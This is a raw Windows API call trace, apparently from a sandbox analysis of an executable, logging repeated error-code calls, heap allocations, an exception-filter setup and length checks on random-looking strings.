[0125.587] GetLastError () returned 0x0 [0125.587] SetLastError (dwErrCode=0x0) [0125.587] GetLastError () returned 0x0 [0125.587] SetLastError (dwErrCode=0x0) [0125.587] GetLastError () returned 0x0 [0125.587] SetLastError (dwErrCode=0x0) [0125.587] GetLastError () returned 0x0 [0125.587] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.589] SetLastError (dwErrCode=0x0) [0125.589] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.590] SetLastError (dwErrCode=0x0) [0125.590] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.591] GetLastError () returned 0x0 [0125.591] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.592] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.592] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.592] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.592] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.592] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.592] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.592] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.592] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.592] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.592] SetLastError (dwErrCode=0x0) [0125.592] GetLastError () returned 0x0 [0125.593] SetLastError (dwErrCode=0x0) [0125.593] GetLastError () returned 0x0 [0125.593] SetLastError (dwErrCode=0x0) [0125.593] GetLastError () returned 0x0 [0125.593] SetLastError (dwErrCode=0x0) [0125.593] GetLastError () returned 0x0 [0125.593] SetLastError (dwErrCode=0x0) [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x98) returned 0x6c919f8 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x1f) returned 0x6c91a98 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x36) returned 0x6c91ac0 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x37) returned 0x6c91b00 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x3c) returned 0x6c91b40 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x31) returned 0x6c91b88 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x17) returned 0x6c91bc8 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x24) returned 0x6c91be8 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x14) returned 0x6c91c18 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0xd) returned 0x6c91c38 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x25) returned 0x6c91c50 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x39) returned 0x6c91c80 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x18) returned 0x6c91cc8 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x17) returned 0x6c91ce8 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0xe) returned 0x6c91d08 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x69) returned 0x6c91d20 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x3e) returned 0x6c91d98 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x1b) returned 0x6c91de0 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x1d) returned 0x6c91e08 [0125.593] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x48) returned 0x6c91e30 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x12) returned 0x6c91e80 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x18) returned 0x6c91ea0 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x1b) returned 0x6c91ec0 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x24) returned 0x6c91ee8 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x29) returned 0x6c91f18 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x1e) returned 0x6c91f50 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x41) returned 0x6c91f78 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x17) returned 0x6c91fc8 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0xf) returned 0x6c91fe8 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x16) returned 0x6c92000 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x2a) returned 0x6c92020 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x29) returned 0x6c92058 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x15) returned 0x6c92090 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x1e) returned 0x6c920b0 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x2a) returned 0x6c920d8 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x12) returned 0x6c92110 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x18) returned 0x6c92130 [0125.594] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x46) returned 0x6c92150 [0125.594] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x6c911f8 | out: hHeap=0x6c90000) returned 1 [0125.595] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x80) returned 0x6c911f8 [0125.595] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x800) returned 0x6c921a0 [0125.595] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0125.595] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.595] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4656c8) returned 0x4047dd [0125.609] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.609] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.609] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.609] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.610] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.610] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.610] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.610] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.611] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.611] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.611] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.611] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.612] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.612] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.612] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.612] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.613] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.613] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.613] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.613] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.614] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.614] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.614] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.615] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.615] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.615] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.615] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.615] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.616] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.616] RtlSizeHeap (HeapHandle=0x6c90000, Flags=0x0, MemoryPointer=0x6c911f8) returned 0x80 [0125.616] GetLastError () returned 0x0 [0125.616] SetLastError (dwErrCode=0x0) [0125.616] GetLastError () returned 0x0 [0125.616] SetLastError (dwErrCode=0x0) [0125.616] GetLastError () returned 0x0 [0125.616] SetLastError (dwErrCode=0x0) [0125.616] GetLastError () returned 0x0 [0125.651] SetLastError (dwErrCode=0x0) [0125.651] GetLastError () returned 0x0 [0125.652] SetLastError (dwErrCode=0x0) [0125.652] GetLastError () returned 0x0 [0125.652] SetLastError (dwErrCode=0x0) [0125.652] GetLastError () returned 0x0 [0125.652] SetLastError (dwErrCode=0x0) [0125.652] GetLastError () returned 0x0 [0125.652] SetLastError (dwErrCode=0x0) [0125.652] GetLastError () returned 0x0 [0125.653] SetLastError (dwErrCode=0x0) [0125.653] GetLastError () returned 0x0 [0125.653] SetLastError (dwErrCode=0x0) [0125.653] GetLastError () returned 0x0 [0125.653] SetLastError (dwErrCode=0x0) [0125.653] GetLastError () returned 0x0 [0125.653] SetLastError (dwErrCode=0x0) [0125.653] GetLastError () returned 0x0 [0125.653] SetLastError (dwErrCode=0x0) [0125.653] GetLastError () returned 0x0 [0125.653] SetLastError (dwErrCode=0x0) [0125.653] GetLastError () returned 0x0 [0125.653] SetLastError (dwErrCode=0x0) [0125.653] GetLastError () returned 0x0 [0125.653] SetLastError (dwErrCode=0x0) [0125.653] GetLastError () returned 0x0 [0125.653] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.656] SetLastError (dwErrCode=0x0) [0125.656] GetLastError () returned 0x0 [0125.656] SetLastError (dwErrCode=0x0) [0125.656] GetLastError () returned 0x0 [0125.656] SetLastError (dwErrCode=0x0) [0125.656] GetLastError () returned 0x0 [0125.656] SetLastError (dwErrCode=0x0) [0125.656] GetLastError () returned 0x0 [0125.656] SetLastError (dwErrCode=0x0) [0125.656] GetLastError () returned 0x0 [0125.656] SetLastError (dwErrCode=0x0) [0125.656] GetLastError () returned 0x0 [0125.656] SetLastError (dwErrCode=0x0) [0125.656] GetLastError () returned 0x0 [0125.656] SetLastError (dwErrCode=0x0) [0125.656] GetLastError () returned 0x0 [0125.656] SetLastError (dwErrCode=0x0) [0125.656] GetLastError () returned 0x0 [0125.656] SetLastError (dwErrCode=0x0) [0125.657] GetLastError () returned 0x0 [0125.657] SetLastError (dwErrCode=0x0) [0125.657] GetLastError () returned 0x0 [0125.657] SetLastError (dwErrCode=0x0) [0125.657] GetLastError () returned 0x0 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] lstrlenA (lpString="0V9EY5U1YIO8") returned 12 [0125.657] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x5364500 [0125.657] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.657] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.657] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.657] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.657] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.658] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.658] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.658] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.658] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.658] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.658] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.658] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.658] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.658] lstrlenA (lpString="DFNB2PX5VVR837") returned 14 [0125.658] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x5364518 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] lstrlenA (lpString="N7OB77NPHD2VW4L") returned 15 [0125.658] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x53554a8 [0125.658] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.658] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.658] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.658] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] lstrlenA (lpString="Z2YI4PSMBQ8E0YFEAK0") returned 19 [0125.659] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x5364530 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] lstrlenA (lpString="RWNXKRUX7JIH") returned 12 [0125.659] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x5364548 [0125.660] lstrlenA (lpString="22U53309S") returned 9 [0125.660] lstrlenA (lpString="22U53309S") returned 9 [0125.660] lstrlenA (lpString="22U53309S") returned 9 [0125.660] lstrlenA (lpString="22U53309S") returned 9 [0125.660] lstrlenA (lpString="22U53309S") returned 9 [0125.660] lstrlenA (lpString="22U53309S") returned 9 [0125.660] lstrlenA (lpString="22U53309S") returned 9 [0125.660] lstrlenA (lpString="22U53309S") returned 9 [0125.660] lstrlenA (lpString="22U53309S") returned 9 [0125.660] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x5364f38 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.660] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.661] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.661] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.661] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.661] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.661] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.661] lstrlenA (lpString="V6TY85G558A14VBGDX5BSN0YA1") returned 26 [0125.661] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5364f60 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.661] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.662] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.662] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.662] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.662] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.662] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.662] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.662] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 [0125.662] lstrlenA (lpString="ZSZK223Q9X76RPRF40PAU94CW5KO6IF") returned 31 